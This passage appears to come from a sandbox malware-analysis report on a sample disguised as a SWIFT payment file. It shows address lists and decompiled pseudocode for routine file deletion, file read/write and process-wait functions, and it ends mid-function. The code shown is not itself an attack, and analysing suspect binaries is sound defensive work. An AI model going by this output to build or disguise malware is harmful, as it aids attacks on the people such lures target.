0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x0040741c
0x00407420
0x004075cf
0x004075e5
0x004075ed
0x004075f4
0x004075f6
0x004075fd
0x00407601
0x00407601
0x0040742c
0x00407433
0x0040743b
0x0040743e
0x00407441
0x00407441
0x00407447
0x00407447
0x00406be3
0x00406be3
0x00406be3
0x00406bec
0x00000000
0x00000000
0x00406bf2
0x00000000
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c5c
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x004073cb
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d5f
0x00406d61
0x00406d64
0x00406dd5
0x00406dd8
0x00406ddb
0x00406de2
0x00406dec
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x00406d66
0x00406d6a
0x00406d6d
0x00406d6f
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d87
0x00406d8b
0x00406d92
0x00406d95
0x00406d9c
0x00406da0
0x00406da8
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406dac
0x00406daf
0x00406dcd
0x00406dcf
0x00000000
0x00406db1
0x00406db1
0x00406db4
0x00406db7
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00000000
0x00406dc8
0x00000000
0x00406ffe
0x00407002
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407007
0x0040700a
0x00407014
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x00000000
0x00000000
0x00000000
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x0040711c
0x00407120
0x00407127
0x0040712a
0x0040712d
0x00407137
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x00407122
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x0040715d
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfc
0x00407569
0x00000000
0x00407569
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e17
0x00406e1a
0x00406e1d
0x00406e1d
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2f
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e93
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406e9c
0x00406ea3
0x00406ea6
0x00000000
0x00406eac
0x00000000
0x00406eac
0x00000000
0x00406eb1
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x00000000
0x00407395
0x00407399
0x004073bb
0x004073be
0x004073c8
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00000000
0x00407489
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407546
0x00407447
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00407447
0x00407447
0x00000000
0x0040744d
0x00407447
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074eb
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x0040751d
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x00000000
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00407447
0x004073ce
0x004073cb

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00405D2C Relevance: 4.5, APIs: 3, Instructions: 28
fileCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E00405D2C(void* __eflags, WCHAR* _a4, signed int _a8) {
				int _t9;
				long _t13;
				WCHAR* _t14;

				_t14 = _a4;
				_t13 = E00406133(_t14);
				if(_t13 == 0xffffffff) {
					L8:
					return 0;
				}
				_push(_t14);
				if((_a8 & 0x00000001) == 0) {
					_t9 = DeleteFileW();
				} else {
					_t9 = RemoveDirectoryW(); // executed
				}
				if(_t9 == 0) {
					if((_a8 & 0x00000004) == 0) {
						SetFileAttributesW(_t14, _t13);
					}
					goto L8;
				} else {
					return 1;
				}
			}

0x00405d2d
0x00405d38
0x00405d3d
0x00405d6d
0x00000000
0x00405d6d
0x00405d44
0x00405d45
0x00405d4f
0x00405d47
0x00405d47
0x00405d47
0x00405d57
0x00405d63
0x00405d67
0x00405d67
0x00000000
0x00405d59
0x00000000
0x00405d5b

APIs

Part of subcall function 00406133: GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
Part of subcall function 00406133: SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C

RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F0E), ref: 00405D47
DeleteFileW.KERNEL32(?,?,?,00000000,00405F0E), ref: 00405D4F
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D67

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: File$Attributes$DeleteDirectoryRemove
String ID:
API String ID: 1655745494-0
Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
Instruction ID: f7500ddcb6900c42920b0fa7cdf939b3a50fd8fb6693fff67202f671924a8b23
Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
Instruction Fuzzy Hash: 6DE0E531218A9156C3207734AD0CB5B2A98EF86314F09893FF5A2B11E0D77885078AAD

Uniqueness

Uniqueness Score: -1.00%

Function 00406AE0 Relevance: 4.5, APIs: 3, Instructions: 27
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406AE0(void* __ecx, void* _a4) {
				long _v8;
				long _t6;

				_t6 = WaitForSingleObject(_a4, 0x64);
				while(_t6 == 0x102) {
					E00406A71(0xf);
					_t6 = WaitForSingleObject(_a4, 0x64);
				}
				GetExitCodeProcess(_a4,  &_v8); // executed
				return _v8;
			}

0x00406af1
0x00406b08
0x00406afc
0x00406b06
0x00406b06
0x00406b13
0x00406b1f

APIs

WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00406B06
GetExitCodeProcess.KERNELBASE ref: 00406B13

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: ObjectSingleWait$CodeExitProcess
String ID:
API String ID: 2567322000-0
Opcode ID: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
Instruction ID: dffe0f0baa3edeb4a8159ab808a8d66eaa88359a938bc324e0f181ad12cbd91f
Opcode Fuzzy Hash: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
Instruction Fuzzy Hash: 36E09236600118FBDB00AB54DD05E9E7B6ADB45704F114036FA05B6190C6B1AE22DA94

Uniqueness

Uniqueness Score: -1.00%

Function 0040620A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040620A(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x0040620e
0x0040621e
0x00406226
0x00000000
0x0040622d
0x00000000
0x0040622f

APIs

WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,0040FE4F,ebruary,00403579,ebruary,0040FE4F,00414EF0,00004000,?,00000000,004033A3,00000004), ref: 0040621E

Strings

ebruary, xrefs: 0040620A

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: FileWrite
String ID: ebruary
API String ID: 3934441357-2749923991
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5

Uniqueness

Uniqueness Score: -1.00%

Function 004061DB Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004061DB(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x004061df
0x004061ef
0x004061f7
0x00000000
0x004061fe
0x00000000
0x00406200

APIs

ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,ebruary,004035F5,?,?,004034F9,00414EF0,00004000,?,00000000,004033A3), ref: 004061EF

Strings

ebruary, xrefs: 004061DB

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: FileRead
String ID: ebruary
API String ID: 2738559852-2749923991
Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8

Uniqueness

Uniqueness Score: -1.00%

Function 00403371 Relevance: 3.1, APIs: 2, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00403371(void* __ecx, long _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t29;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42a2b8;
					 *0x420ef4 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E00403479(4);
				if(_t22 >= 0) {
					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x420ef4 =  *0x420ef4 + 4;
						_t36 = E00403479(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x420ef4 =  *0x420ef4 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										_t29 = E004061DB( *0x40a01c, 0x414ef0, _t28); // executed
										if(_t29 == 0) {
											goto L18;
										}
										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x420ef4 =  *0x420ef4 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}

0x00403375
0x0040337e
0x00403387
0x0040338b
0x00403396
0x00403396
0x0040339e
0x004033a5
0x004033b7
0x004033be
0x00403463
0x00403463
0x00000000
0x004033c4
0x004033c7
0x004033d3
0x004033d7
0x00403471
0x00403471
0x004033dd
0x004033e0
0x0040343f
0x00403445
0x00403447
0x00403447
0x00403459
0x00403461
0x00403468
0x0040346b
0x00000000
0x00000000
0x00000000
0x00000000
0x004033e2
0x004033e5
0x00000000
0x004033eb
0x004033f0
0x004033f7
0x004033fa
0x004033fc
0x004033fc
0x00403409
0x0040340c
0x00403413
0x00000000
0x00000000
0x0040341c
0x00403423
0x0040343b
0x00403465
0x00403465
0x00403425
0x00403425
0x00403428
0x0040342b
0x00403431
0x00403437
0x00000000
0x00403439
0x00000000
0x00403439
0x00403437
0x00000000
0x00403423
0x00000000
0x004033f0
0x004033e5
0x004033e0
0x004033d7
0x004033be
0x00403473
0x00403476

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a290;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42924c =  *0x42924c + _t12;
